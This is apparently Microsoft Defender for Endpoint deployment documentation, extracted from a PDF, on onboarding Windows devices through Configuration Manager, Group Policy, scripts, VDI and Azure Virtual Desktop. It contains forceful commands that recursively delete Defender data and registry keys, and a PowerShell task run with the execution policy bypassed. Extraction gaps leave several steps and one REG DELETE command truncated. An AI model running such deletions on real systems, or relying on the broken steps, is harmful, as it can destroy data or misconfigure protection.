8. Select Next and Close.
9. Select Next.

After completing this task you have a device collection with all the Windows endpoints
in the environment.
Other recommended configuration settings

After onboarding devices to the service, it's important to take advantage of the included
threat protection capabilities by enabling them with the following recommended
Device collection configuration

If you're using Configuration Manager, version 2002 or later, you can choose to broaden
the deployment to include servers or down-level clients.
Next generation protection configuration

The following configuration settings are recommended:
Scan
Scan removable storage devices such as USB drives: Yes
Real-time Protection
Enable Behavioral Monitoring: Yes
Enable protection against Potentially Unwanted Applications at download and
prior to installation: Yes
Cloud Protection Service

Cloud Protection Service membership type: Advanced membership

Configure all available rules to Audit.
７ Note
Blocking these activities may interrupt legitimate business processes. The best
approach is setting everything to audit, identifying which ones are safe to turn on,
and then enabling those settings on endpoints which do not have false positive
detections.
For deploying Microsoft Defender Antivirus and attack surface reduction policies
through Microsoft Configuration Manager (SCCM) follow the steps:
Enable Endpoint Protection and configure custom client settings.

Install the Endpoint Protection client from a command prompt.
Verify the Endpoint Protection client installation.
Enable Endpoint Protection and configure custom client settings
Follow the steps to enable endpoint protection and configuration of custom client
settings:
1. In the Configuration Manager console, click Administration.
2. In the Administration workspace, click Client Settings.
3. On the Home tab, in the Create group, click Create Custom Client Device Settings.
4. In the Create Custom Client Device Settings dialog box, provide a name and a
description for the group of settings, and then select Endpoint Protection.
5. Configure the Endpoint Protection client settings that you require. For a full list of
Endpoint Protection client settings that you can configure, see the Endpoint
Protection section in About client settings.
） Important
Install the Endpoint Protection site system role before you configure client
settings for Endpoint Protection.
6. Click OK to close the Create Custom Client Device Settings dialog box. The new
client settings are displayed in the Client Settings node of the Administration
workspace.
7. Next, deploy the custom client settings to a collection. Select the custom client
settings you want to deploy. In the Home tab, in the Client Settings group, click
Deploy.
8. In the Select Collection dialog box, choose the collection to which you want to
deploy the client settings and then click OK. The new deployment is shown in the
Deployments tab of the details pane.
Clients are configured with these settings when they next download client policy. For
more information, see Initiate policy retrieval for a Configuration Manager client.
Installation of Endpoint Protection client from a command prompt
Follow the steps to complete installation of endpoint protection client from the
command prompt.
1. Copy scepinstall.exe from the Client folder of the Configuration Manager

installation folder to the computer on which you want to install the Endpoint
Protection client software.
2. Open a command prompt as an administrator. Change directory to the folder with

the installer. Then run scepinstall.exe , adding any extra command-line properties
that you require:
ﾉ Expand table
Property Description
/s Run the installer silently
/q Extract the setup files silently
/i Run the installer normally

/policy Specify an antimalware policy file to configure the client during installation
/sqmoptin Opt-in to the Microsoft Customer Experience Improvement Program (CEIP)
3. Follow the on-screen instructions to complete the client installation.
4. If you downloaded the latest update definition package, copy the package to the
client computer, and then double-click the definition package to install it.
７ Note
After the Endpoint Protection client install completes, the client automatically
performs a definition update check. If this update check succeeds, you don't
have to manually install the latest definition update package.
Example: install the client with an antimalware policy
scepinstall.exe /policy <full path>\<policy file>
Verify the Endpoint Protection client installation
After you install the Endpoint Protection client on your reference computer, verify that
the client is working correctly.
1. On the reference computer, open System Center Endpoint Protection from the
Windows notification area.
2. On the Home tab of the System Center Endpoint Protection dialog box, verify that
Real-time protection is set to On.
3. Verify that up to date is displayed for Virus and spyware definitions.
4. To make sure that your reference computer is ready for imaging, under Scan
options, select Full, and then click Scan now.
Network protection
Prior to enabling network protection in audit or block mode, ensure that you've installed
the antimalware platform update, which can be obtained from the support page .

Enable the feature in audit mode for at least 30 days. After this period, review detections
and create a list of applications that are allowed to write to protected directories.
For more information, see Evaluate controlled folder access.

Offboard devices using Configuration Manager

When downloading an offboarding package, you will be notified of the packages expiry
７ Note
Offboard devices using Microsoft Configuration Manager

current branch
If you use Microsoft Configuration Manager current branch, see Create an offboarding
configuration file.
Offboard devices using System Center 2012 R2

Offboarding.
c. In the Deployment method field, select System Center Configuration Manager
2012/2012 R2/1511/1602.
d. Select Download package, and save the .zip file.
have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-
DD.cmd.
3. Deploy the package by following the steps in the Packages and Programs in
System Center 2012 R2 Configuration Manager article.
Choose a predefined device collection to deploy the package to.
） Important
to 6 months.
Monitor device configuration

If you're using Microsoft Configuration Manager current branch, use the built-in
Defender for Endpoint dashboard in the Configuration Manager console. For more
information, see Defender for Endpoint - Monitor.
If you're using System Center 2012 R2 Configuration Manager, monitoring consists of

two parts:
1. Confirming the configuration package has been correctly deployed and is running
(or has successfully run) on the devices in your network.
2. Checking that the devices are compliant with the Defender for Endpoint service
(this ensures the device can complete the onboarding process and can continue to
report data to the service).
Confirm the configuration package has been correctly

deployed
1. In the Configuration Manager console, click Monitoring at the bottom of the
navigation pane.
2. Select Overview and then Deployments.
3. Select on the deployment with the package name.

4. Review the status indicators under Completion Statistics and Content Status.
If there are failed deployments (devices with Error, Requirements Not Met, or
Failed statuses), you may need to troubleshoot the devices. For more information,
see, Troubleshoot Microsoft Defender for Endpoint onboarding issues.
Check that the devices are compliant with the Microsoft

You can set a compliance rule for configuration item in System Center 2012 R2
Configuration Manager to monitor your deployment.
This rule should be a non-remediating compliance rule configuration item that monitors
the value of a registry key on targeted devices.
Monitor the following registry key entry:
Console
Path: "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"

Name: "OnboardingState"
Value: "1"
For more information, see Introduction to compliance settings in System Center 2012 R2
Configuration Manager.
Related topics
Onboard Windows devices using Mobile Device Management tools
device
 Tip
Feedback

Onboard Windows devices using Group
Policy
Article • 09/15/2023
） Important

Applies to:
Group Policy
７ Note
To use Group Policy (GP) updates to deploy the package, you must be on Windows
Server 2008 R2 or later.
For Windows Server 2019 and Windows Server 2022, you may need to replace NT
AUTHORITY\Well-Known-System-Account with NT AUTHORITY\SYSTEM of the XML
file that the Group Policy preference creates.
７ Note
If you're using the new, unified Microsoft Defender for Endpoint solution for
Windows Server 2012 R2 and 2016, please ensure you are using the latest ADMX
files in your central store to get access to the correct Microsoft Defender for
Endpoint policy options. Please reference How to create and manage the Central
Store for Group Policy Administrative Templates in Windows and download the
latest files for use with Windows 10.
1. Open the GP configuration package file

( WindowsDefenderATPOnboardingPackage.zip ) that you downloaded from the service
onboarding wizard. You can also get the package from the Microsoft Defender
portal :
Onboarding.
b. Select the operating system.
c. In the Deployment method field, select Group policy.
d. Click Download package and save the .zip file.
accessed by the device. You should have a folder called OptionalParamsPolicy and
the file WindowsDefenderATPOnboardingScript.cmd.
3. To create a new GPO, open the Group Policy Management Console (GPMC), right-
click Group Policy Objects you want to configure and click New. Enter the name of
the new GPO in the dialogue box that is displayed and click OK.
4. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.
5. In the Group Policy Management Editor, go to Computer configuration, then

Preferences, and then Control panel settings.
6. Right-click Scheduled tasks, point to New, and then click Immediate Task (At least
Windows 7).
7. In the Task window that opens, go to the General tab. Under Security options click
Change User or Group and type SYSTEM and then click Check Names then OK. NT
AUTHORITY\SYSTEM appears as the user account the task will run as.
8. Select Run whether user is logged on or not and check the Run with highest
privileges check box.
9. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).
10. Go to the Actions tab and select New... Ensure that Start a program is selected in
the Action field. Enter the UNC path, using the file server's fully qualified domain
name (FQDN), of the shared WindowsDefenderATPOnboardingScript.cmd file.
11. Select OK and close any open GPMC windows.
12. To link the GPO to an Organization Unit (OU), right-click and select Link an
existing GPO. In the dialogue box that is displayed, select the Group Policy Object
that you wish to link. Click OK.
 Tip
After onboarding the device, you can choose to run a detection test to verify that
the device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Defender for Endpoint device.
Additional Defender for Endpoint configuration

settings
For each device, you can state whether samples can be collected from the device when a
request is made through Microsoft Defender XDR to submit a file for deep analysis.
You can use Group Policy (GP) to configure settings, such as settings for the sample
sharing used in the deep analysis feature.

1. On your GP management device, copy the following files from the configuration
package:
Copy AtpConfiguration.admx into C:\Windows\PolicyDefinitions
Copy AtpConfiguration.adml into C:\Windows\PolicyDefinitions\en-US
If you're using a Central Store for Group Policy Administrative Templates , copy
the following files from the configuration package:
Copy AtpConfiguration.admx into \\<forest.root>\SysVol\

<forest.root>\Policies\PolicyDefinitions
Copy AtpConfiguration.adml into \\<forest.root>\SysVol\

<forest.root>\Policies\PolicyDefinitions\en-US
2. Open the Group Policy Management Console, right-click the GPO you want to
configure and click Edit.
3. In the Group Policy Management Editor, go to Computer configuration.
4. Click Policies, then Administrative templates.
5. Click Windows components and then Windows Defender ATP.
6. Choose to enable or disable sample sharing from your devices.
７ Note
If you don't set a value, the default value is to enable sample collection.
Update endpoint protection configuration

After configuring the onboarding script, continue editing the same group policy to add
endpoint protection configurations. Perform group policy edits from a system running
Windows 10 or Server 2019, Windows 11, or Windows Server 2022 to ensure you have
all of the required Microsoft Defender Antivirus capabilities. You may need to close and
reopen the group policy object to register the Defender ATP configuration settings.
All policies are located under Computer Configuration\Policies\Administrative

Templates .
Policy location: \Windows Components\Windows Defender ATP
ﾉ Expand table
Policy Setting
Enable\Disable Sample collection Enabled - "Enable sample collection on machines" checked
Policy location: \Windows Components\Microsoft Defender Antivirus
ﾉ Expand table
Policy Setting
Configure detection for potentially unwanted applications Enabled, Block
Policy location: \Windows Components\Microsoft Defender Antivirus\MAPS
ﾉ Expand table
Policy Setting
Join Microsoft MAPS Enabled, Advanced MAPS
Send file samples when further analysis is required Enabled, Send safe samples
Policy location: \Windows Components\Microsoft Defender Antivirus\Real-time

Protection
ﾉ Expand table
Policy Setting
Turn off real-time protection Disabled
Turn on behavior monitoring Enabled
Scan all downloaded files and attachments Enabled
Monitor file and program activity on your computer Enabled
Policy location: \Windows Components\Microsoft Defender Antivirus\Scan
These settings configure periodic scans of the endpoint. We recommend performing a

weekly quick scan, performance permitting.
ﾉ Expand table
Policy Setting
Check for the latest virus and spyware security intelligence before running a scheduled Enabled
scan
Policy location: \Windows Components\Microsoft Defender Antivirus\Microsoft
Defender Exploit Guard\Attack Surface Reduction
Get the current list of attack surface reduction rules GUIDs from Attack surface reduction
rules deployment Step 3: Implement ASR rules. For additional, per rules details, see
1. Open the Configure Attack Surface Reduction policy.
2. Select Enabled.
3. Select the Show button.
4. Add each GUID in the Value Name field with a Value of 2.
This will set each up for audit only.
ﾉ Expand table
Policy Location Setting
Configure \Windows Components\Microsoft Defender Enabled,

Controlled folder Antivirus\Microsoft Defender Exploit Guard\Controlled Audit Mode
access Folder Access
Offboard devices using Group Policy

７ Note
1. Get the offboarding package from the Microsoft Defender portal :
Offboarding.
accessed by the device. You should have a file named
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd.

5. Right-click Scheduled tasks, point to New, and then click Immediate task.
6. In the Task window that opens, go to the General tab under Security options and
select Change User or Group, enter SYSTEM, then select Check Names and then
OK. NT AUTHORITY\SYSTEM appears as the user account that the task will run as.
privileges check-box.
9. Go to the Actions tab and select New.... Ensure that Start a program is selected in
name (FQDN), of the shared
WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-DD.cmd file.
） Important
to 6 months.

With Group Policy there isn't an option to monitor deployment of policies on the
devices. Monitoring can be done directly on the portal, or by using the different
deployment tools.
Monitor devices using the portal

1. Go to the Microsoft Defender portal .
2. Click Devices inventory.
3. Verify that devices are appearing.
７ Note
It can take several days for devices to start showing on the Devices list. This
includes the time it takes for the policies to be distributed to the device, the time it
takes before the user logs on, and the time it takes for the endpoint to start
reporting.
Setup Defender AV policies
Create a new Group Policy or group these settings in with the other policies. This is
dependent upon the customer's environment and how they would like to roll out the
service by targeting different organizational units (OUs).
1. After you choose the GP, or create a new one, edit the GP.
2. Browse to Computer Configuration > Policies > Administrative Templates >

Windows Components > Microsoft Defender Antivirus > Real-time Protection.
3. In the Quarantine folder, configure removal of items from Quarantine folder.

4. In the Scan folder, configure the scan settings.
Monitor all files in Real time protection

Browse to Computer Configuration > Policies > Administrative Templates > Windows
Components > Microsoft Defender Antivirus > Real-time Protection.

Configure Windows Defender SmartScreen settings

Windows Components > Windows Defender SmartScreen > Explorer.

Windows Components > Windows Defender SmartScreen > Microsoft Edge.
Configure Potentially Unwanted Applications

Components > Microsoft Defender Antivirus.


Configure Cloud Deliver Protection and send samples

automatically
Components > Microsoft Defender Antivirus > MAPS.




７ Note
The Send all samples option will provide the most analysis of binaries/scripts/docs
which increases security posture. The Send safe samples option limits the type of
binaries/scripts/docs being analyzed, and decreases security posture.
For more information, see Turn on cloud protection in Microsoft Defender Antivirus, and
Cloud protection and sample submission in Microsoft Defender Antivirus.
Check for signature update

Components > Microsoft Defender Antivirus > Security Intelligence Updates.

Configure cloud deliver timeout and protection level

Components > Microsoft Defender Antivirus > MpEngine. When you configure cloud
protection level policy to Default Microsoft Defender Antivirus blocking policy this will
disable the policy. This is what is required to set the protection level to the windows
default.

Related topics
devices
 Tip
Feedback

Onboard Windows devices using a local
script
Article • 09/01/2023
Applies to:

You can also manually onboard individual devices to Defender for Endpoint. You might
want to do this first when testing the service before you commit to onboarding all
devices in your network.
） Important
This script has been optimized for use on up to ten devices. Local scripting is a
special onboarding method for evaluating Microsoft Defender for Endpoint. The
data reporting frequency is set higher than with other onboarding methods when
onboarding using a local script. This setting is for evaluation purposes and is not
normally used in production deployments. For this reason, there are concerns
about environmental impact, so we recommend limiting the number of
deployments using local scripts to ten. If you are deploying to a production
environment as previously described, use other deployment options like Group
Policy or Microsoft Endpoint Configuration Manager.
Onboard devices
1. Open the configuration package .zip file
(WindowsDefenderATPOnboardingPackage.zip) that you downloaded from the
service onboarding wizard. You can also get the package from Microsoft Defender
portal :
Onboarding.
c. In the Deployment method field, select Local Script.
2. Extract the contents of the configuration package to a location on the device you
want to onboard (for example, the Desktop). You should have a file named
WindowsDefenderATPLocalOnboardingScript.cmd.
3. Open an elevated command-line prompt on the device and run the script:
4. Type the location of the script file. If you copied the file to the desktop, type:
%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd
5. Press the Enter key or click OK.
6. Type "Y" and enter when prompted.
7. After the script completes, it will display "Press any key to continue...". Press any
key to complete the steps on the device.
For information on how you can manually validate that the device is compliant and
correctly reports sensor data see, Troubleshoot Microsoft Defender for Endpoint
onboarding issues.
 Tip
device is properly onboarded to the service. For more information, see Run a
detection test on a newly onboarded Microsoft Defender for Endpoint endpoint.

You can manually configure the sample sharing setting on the device by using regedit or
creating and running a .reg file.
Console

Value: 0 or 1
Where Name type is a D-WORD. Possible values are:
0 - doesn't allow sample sharing from this device

1 - allows sharing of all file types from this device

Offboard devices using a local script

When downloading an offboarding package you will be notified of the packages expiry
７ Note

Offboarding.
accessed by the devices. You should have a file named


%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_YYYY-
MM-DD.cmd
） Important
to 6 months.

You can follow the different verification steps in the Troubleshoot onboarding issues to
verify that the script completed successfully and the agent is running.
Monitoring can also be done directly on the portal, or by using the different deployment
tools.

1. Go to Microsoft Defender portal .
Related articles
device
 Tip
Feedback

Onboard non-persistent virtual desktop
infrastructure (VDI) devices in Microsoft
Defender XDR
Article • 09/21/2023
Virtual desktop infrastructure (VDI) is an IT infrastructure concept that lets end users
access enterprise virtual desktops instances from almost any device (such as your
personal computer, smartphone, or tablet), eliminating the need for organization to
provide users with physical machines. Using VDI devices reduce cost as IT departments
are no longer responsible for managing, repairing, and replacing physical endpoints.
Authorized users can access the same company servers, files, apps, and services from
any approved device through a secure desktop client or browser.
Like any other system in an IT environment, these too should have an Endpoint
Detection and Response (EDR) and Antivirus solution to protect against advanced
threats and attacks.
Applies to:

Virtual desktop infrastructure (VDI) devices
Windows 10, Windows 11, Windows Server 2019, Windows Server 2022, Windows
Server 2008R2/2012R2/2016
７ Note
Persistent VDI's - Onboarding a persistent VDI machine into Microsoft Defender for
Endpoint is handled the same way you would onboard a physical machine, such as
a desktop or laptop. Group policy, Microsoft Configuration Manager, and other
methods can be used to onboard a persistent machine. In the Microsoft Defender
portal, (https://security.microsoft.com ) under onboarding, select your preferred
onboarding method, and follow the instructions for that type. For more information
see Onboarding Windows client.
Onboarding non-persistent virtual desktop
infrastructure (VDI) devices
Defender for Endpoint supports non-persistent VDI session onboarding.
There might be associated challenges when onboarding VDI instances. The following are
typical challenges for this scenario:
Instant early onboarding of a short-lived session, which must be onboarded to

Defender for Endpoint prior to the actual provisioning.
The device name is typically reused for new sessions.
In a VDI environment, VDI instances can have short lifespans. VDI devices can appear in
the Microsoft Defender portal as either single entries for each VDI instance or multiple
entries for each device.
Single entry for each VDI instance. If the VDI instance was already onboarded to
Microsoft Defender for Endpoint, and at some point deleted, and then recreated
with the same host name, a new object representing this VDI instance is NOT be
created in the portal.
７ Note
In this case, the same device name must be configured when the session is
created, for example using an unattended answer file.
Multiple entries for each device - one for each VDI instance.
） Important
If you're deploying non-persistent VDIs through cloning technology, make sure

that your internal template VMs are not onboarded to Defender for Endpoint. This
recommendation is to avoid cloned VMs from being onboarded with the same
senseGuid as your template VMs, which could prevent VMs from showing up as
new entries in the Devices list.
The following steps guide you through onboarding VDI devices and highlight steps for
single and multiple entries.
２ Warning
For environments where there are low resource configurations, the VDI boot
procedure might slow the Defender for Endpoint sensor onboarding.
Onboarding steps
７ Note
Windows Server 2016 and Windows Server 2012 R2 must be prepared by applying
the installation package first using the instructions in Onboard Windows servers
for this feature to work.
1. Open the VDI configuration package .zip file

service onboarding wizard. You can also get the package from the Microsoft
Defender portal :
Onboarding.
c. In the Deployment method field, select VDI onboarding scripts for non-
persistent endpoints.
2. Copy the files from the WindowsDefenderATPOnboardingPackage folder extracted

from the .zip file into the golden/primary image under the path
C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup .
a. If you are implementing multiple entries for each device - one for each session,
copy WindowsDefenderATPOnboardingScript.cmd.
b. If you're implementing a single entry for each device, copy both Onboard-
NonPersistentMachine.ps1 and WindowsDefenderATPOnboardingScript.cmd.
７ Note
If you don't see the

C:\WINDOWS\System32\GroupPolicy\Machine\Scripts\Startup folder, it might be
hidden. You'll need to choose the Show hidden files and folders option from
File Explorer.
3. Open a Local Group Policy Editor window and navigate to Computer

Configuration > Windows Settings > Scripts > Startup.
７ Note
Domain Group Policy may also be used for onboarding non-persistent VDI
devices.
4. Depending on the method you'd like to implement, follow the appropriate steps:
For single entry for each device:
Select the PowerShell Scripts tab, then select Add (Windows Explorer opens
directly in the path where you copied the onboarding script earlier). Navigate
to onboarding PowerShell script Onboard-NonPersistentMachine.ps1 . There's
no need to specify the other file, as it is triggered automatically.
For multiple entries for each device:
Select the Scripts tab, then click Add (Windows Explorer opens directly in the
path where you copied the onboarding script earlier). Navigate to the
onboarding bash script WindowsDefenderATPOnboardingScript.cmd .
5. Test your solution:
a. Create a pool with one device.
b. Log on to device.
c. Log off from device.
d. Log on to device with another user.
e. Depending on the method you'd like to implement, follow the appropriate

steps:
For single entry for each device: Check only one entry in Microsoft
Defender portal.
For multiple entries for each device: Check multiple entries in Microsoft
Defender portal.
6. Click Devices list on the Navigation pane.
7. Use the search function by entering the device name and select Device as search
type.
For downlevel SKUs (Windows Server 2008 R2)
７ Note
These instructions for other Windows server versions also apply if you are running
the previous Microsoft Defender for Endpoint for Windows Server 2016 and
Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the new
unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.
The following registry is relevant only when the aim is to achieve a 'Single entry for each
device'.
1. Set registry value to:
Console
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat

Protection\DeviceTagging]
"VDI"="NonPersistent"
or using command line:
Console
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows

Advanced Threat Protection\DeviceTagging" /v VDI /t REG_SZ /d
"NonPersistent" /f
2. Follow the server onboarding process.
Updating virtual desktop infrastructure (VDI)

images (persistent or non-persistent)
With the ability to easily deploy updates to VMs running in VDIs, we've shortened this
guide to focus on how you can get updates on your machines quickly and easily. You no
longer need to create and seal golden images on a periodic basis, as updates are
expanded into their component bits on the host server and then downloaded directly to
the VM when it's turned on.
If you have onboarded the primary image of your VDI environment (SENSE service is
running), then you must offboard and clear some data before putting the image back
into production.
1. Offboard the machine.
2. Ensure the sensor is stopped by running the following command in a CMD

window:
Console
sc query sense
3. Run the following commands in a CMD window::
Console
del "C:\ProgramData\Microsoft\Windows Defender Advanced Threat

Protection\Cyber\*.*" /f /s /q
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection"
/v senseGuid /f
/v 7DC0B629-D7F6-4DB3-9BF7-64D5AAF50F1A /f
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\48A68F11-7A16-4180-B32C-7F974C7BD783" /f
exit
Are you using a third party for VDIs?

If you're deploying non-persistent VDIs through VMware instant cloning or similar
technologies, make sure that your internal template VMs and replica VMs are not
onboarded to Defender for Endpoint. If you onboard devices using the single entry
method, instant clones that are provisioned from onboarded VMs might have the same
senseGuid, and that can stop a new entry from being listed in the Device Inventory view
(in the Microsoft Defender portal , choose Assets > Devices).
If either the primary image, template VM, or replica VM are onboarded to Defender for
Endpoint using the single entry method, it will stop Defender from creating entries for
new non-persistent VDIs in the Microsoft Defender portal.
Reach out to your third-party vendors for further assistance.



Turn on cloud-delivered protection: Yes
Cloud-delivered protection level: Not configured
Defender Cloud Extended Timeout In Seconds: 20
Exclusions
Please review the FXLogix antivirus exclusion recommendations here: Prerequisites

for FSLogix.
Turn on all settings and set to monitor all files
Remediation
Number of days to keep quarantined malware: 30
Submit samples consent: Send all samples automatically
Action to take on potentially unwanted apps: Enable
Actions for detected threats:
Low threat: Clean
Moderate threat, High threat, Severe threat: Quarantine
Scan
Scan archived files: Yes
Use low CPU priority for scheduled scans: Not configured
Disable catch-up full scan: Not configured
Disable catchup quick scan: Not configured
CPU usage limit per scan: 50
Scan mapped network drives during full scan: Not configured
Run daily quick scan at: 12 PM
Scan type: Not configured
Day of week to run scheduled scan: Not configured
Time of day to run a scheduled scan: Not configured
Check for signature updates before running scan: Yes
Updates
Enter how often to check for security intelligence updates: 8

Leave other settings in default state
User experience
Allow user access to Microsoft Defender app: Not configured
Enable Tamper protection

Enable tamper protection to prevent Microsoft Defender being disabled: Enable

Enable network protection: Test mode
Require SmartScreen for Microsoft Edge: Yes
Block malicious site access: Yes
Block unverified file download: Yes

７ Note
detections.
Related topics
Onboard Windows devices using Microsoft Configuration Manager
 Tip
Feedback

Onboard Windows devices in Azure
Virtual Desktop
Article • 01/18/2024
6 minutes to read
Applies to:

Windows multi-session running on Azure Virtual Desktop (AVD)
Windows 10 Enterprise Multi-Session
Microsoft Defender for Endpoint supports monitoring both VDI and Azure Virtual
Desktop sessions. Depending on your organization's needs, you might need to
implement VDI or Azure Virtual Desktop sessions to help your employees access
corporate data and apps from an unmanaged device, remote location, or similar
scenario. With Microsoft Defender for Endpoint, you can monitor these virtual machines
for anomalous activity.
Before you begin

Familiarize yourself with the considerations for non-persistent VDI. While Azure Virtual
Desktop doesn't provide non-persistence options, it does provide ways to use a golden
Windows image that can be used to provision new hosts and redeploy machines. This
increases volatility in the environment and thus impacts what entries are created and
maintained in the Microsoft Defender for Endpoint portal, potentially reducing visibility
for your security analysts.
７ Note
Depending on your choice of onboarding method, devices can appear in Microsoft

Defender for Endpoint portal as either:
Single entry for each virtual desktop

Multiple entries for each virtual desktop
Microsoft recommends onboarding Azure Virtual Desktop as a single entry per virtual
desktop. This ensures that the investigation experience in the Microsoft Defender for
Endpoint portal is in the context of one device based on the machine name.
Organizations that frequently delete and redeploy AVD hosts should strongly consider
using this method as it prevents multiple objects for the same machine from being
created in the Microsoft Defender for Endpoint portal. This can lead to confusion when
investigating incidents. For test or non-volatile environments, you may opt to choose
differently.
Microsoft recommends adding the Microsoft Defender for Endpoint onboarding script
to the AVD golden image. This way, you can be sure that this onboarding script runs
immediately at first boot. It's executed as a startup script at first boot on all the AVD
machines that are provisioned from the AVD golden image. However, if you're using one
of the gallery images without modification, place the script in a shared location and call
it from either local or domain group policy.
７ Note
The placement and configuration of the VDI onboarding startup script on the AVD
golden image configures it as a startup script that runs when the AVD starts. It's not
recommended to onboard the actual AVD golden image. Another consideration is
the method used to run the script. It should run as early in the startup/provisioning
process as possible to reduce the time between the machine being available to
receive sessions and the device onboarding to the service. Below scenarios 1 and 2
take this into account.
Scenarios
There are several ways to onboard an AVD host machine:
Run the script in the golden image (or from a shared location) during startup.
Use a management tool to run the script.
Through Integration with Microsoft Defender for Cloud
Scenario 1: Using local group policy
This scenario requires placing the script in a golden image and uses local group policy
to run early in the boot process.
Use the instructions in Onboard the non-persistent virtual desktop infrastructure (VDI)
devices.
Follow the instructions for a single entry for each device.

Scenario 2: Using domain group policy
This scenario uses a centrally located script and runs it using a domain-based group
policy. You can also place the script in the golden image and run it in the same way.
Download the WindowsDefenderATPOnboardingPackage.zip file

from the Microsoft Defender portal

(WindowsDefenderATPOnboardingPackage.zip)
a. In the Microsoft Defender portal navigation pane, select Settings > Endpoints >
Onboarding (under Device Management).
the files WindowsDefenderATPOnboardingScript.cmd and Onboard-
NonPersistentMachine.ps1.
Use Group Policy management console to run the script when the
virtual machine starts
2. In the Group Policy Management Editor, go to Computer configuration >

Preferences > Control panel settings.
3. Right-click Scheduled tasks, click New, and then click Immediate Task (At least
Windows 7).
Change User or Group and type SYSTEM. Click Check Names and then click OK.
NT AUTHORITY\SYSTEM appears as the user account the task will run as.
6. Go to the Actions tab and click New. Ensure that Start a program is selected in the
Action field. Enter the following:
Action = "Start a program"
Program/Script = C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
Add Arguments (optional) = -ExecutionPolicy Bypass -command "&

\\Path\To\Onboard-NonPersistentMachine.ps1"
Then select OK and close any open GPMC windows.
Scenario 3: Onboarding using management tools

If you plan to manage your machines using a management tool, you can onboard
devices with Microsoft Endpoint Configuration Manager.
For more information, see Onboard Windows devices using Configuration Manager.
２ Warning
If you plan to use Attack surface reduction rules reference, note that the rule
"Block process creations originating from PSExec and WMI commands" should
not be used, because that rule is incompatible with management through Microsoft
Endpoint Configuration Manager. The rule blocks WMI commands that the
Configuration Manager client uses to function correctly.
 Tip
detection test on a newly onboarded Microsoft Defender for Endpoint device.
Tagging your machines when building your golden image
As part of your onboarding, you may want to consider setting a machine tag to
differentiate AVD machines more easily in the Microsoft Security Center. For more
information, see Add device tags by setting a registry key value.
When building your golden image, you may want to configure initial protection settings
as well. For more information, see Other recommended configuration settings.
Also, if you're using FSlogix user profiles, we recommend you follow the guidance
described in FSLogix antivirus exclusions.
Note on licensing: When using Windows Enterprise multi-session, depending on your

requirements, you can choose to either have all users licensed through Microsoft
Defender for Endpoint (per user), Windows Enterprise E5, Microsoft 365 E5 Security, or
Microsoft 365 E5, or have the VM licensed through Microsoft Defender for Cloud.
Licensing requirements for Microsoft Defender for Endpoint can be found at: Licensing
requirements.
Related Links
Add exclusions for Defender for Endpoint via PowerShell
FSLogix anti-malware exclusions
Configure Microsoft Defender Antivirus on a remote desktop or virtual desktop

infrastructure environment
 Tip
Feedback

Article • 03/08/2023
Applies to:

Platforms

Windows 7 SP1 Pro
Windows 8.1 Pro
Defender for Endpoint extends support to include down-level operating systems,

providing advanced attack detection and investigation capabilities on supported
Windows versions.
To onboard down-level Windows client endpoints to Defender for Endpoint, you'll need
to:
Configure and update System Center Endpoint Protection clients

Install and configure Microsoft Monitoring Agent (MMA) to report sensor data
For Windows Server 2008 R2 SP1, you have the option of onboarding through Microsoft
Defender for Cloud.
７ Note
Defender for Endpoint standalone server license is required, per node, in order to
onboard a Windows server through Microsoft Monitoring Agent (Option 1).
Alternatively, a Microsoft Defender for servers license is required, per node, in order
to onboard a Windows server through Microsoft Defender for Cloud (Option 2), see
Supported features available in Microsoft Defender for Cloud.
 Tip
After onboarding the device, you can choose to run a detection test to verify that it
is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Defender for Endpoint endpoint.
Configure and update System Center Endpoint

Protection clients
Defender for Endpoint integrates with System Center Endpoint Protection to provide
visibility to malware detections and to stop propagation of an attack in your
organization by banning potentially malicious files or suspected malware.
The following steps are required to enable this integration:
Install the January 2017 anti-malware platform update for Endpoint Protection
clients
Configure the SCEP client Cloud Protection Service membership to the Advanced
setting
Configure your network to allow connections to the Microsoft Defender Antivirus
cloud. For more information, see Configure and validate Microsoft Defender
Antivirus network connections
Install and configure Microsoft Monitoring

Agent (MMA)
Before you begin

Review the following details to verify minimum system requirements:
Install the February 2018 monthly update rollup - Direct download link from the
Windows Update catalog is available here
Install the March 12, 2019 (or later) Servicing stack update - Direct download link
from the Windows Update catalog is available here
Install the SHA-2 code signing support update - Direct download link from the
Windows Update catalog is available here
７ Note
Only applicable for Windows Server 2008 R2, Windows 7 SP1 Enterprise, and
Windows 7 SP1 Pro.
Install the Update for customer experience and diagnostic telemetry
Install Microsoft .Net Framework 4.5.2 or later
７ Note
Installation of .NET 4.5 might require you to restart your computer after
installation.
Meet the Azure Log Analytics agent minimum system requirements. For more
information, see Collect data from computers in you environment with Log
Analytics
Installation steps
1. Download the agent setup file: Windows 64-bit agent or Windows 32-bit
agent .
７ Note
Due to the deprecation of SHA-1 support by the MMA agent, the MMA
agent needs to be version 10.20.18029 or newer.
2. Obtain the workspace ID:
In the Defender for Endpoint navigation pane, select Settings > Device
management > Onboarding
Select the operating system
Copy the workspace ID and workspace key
3. Using the Workspace ID and Workspace key choose any of the following
installation methods to install the agent:
Manually install the agent using setup.
On the Agent Setup Options page, select Connect the agent to Azure Log
Analytics (OMS)
Install the agent using the command line.

Configure the agent using a script.
７ Note
If you are a US Government customer, under "Azure Cloud" you'll need to

choose "Azure US Government" if using the setup wizard, or if using a
command line or a script - set the
"OPINSIGHTS_WORKSPACE_AZURE_CLOUD_TYPE" parameter to 1.
4. If you're using a proxy to connect to the Internet see the Configure proxy and
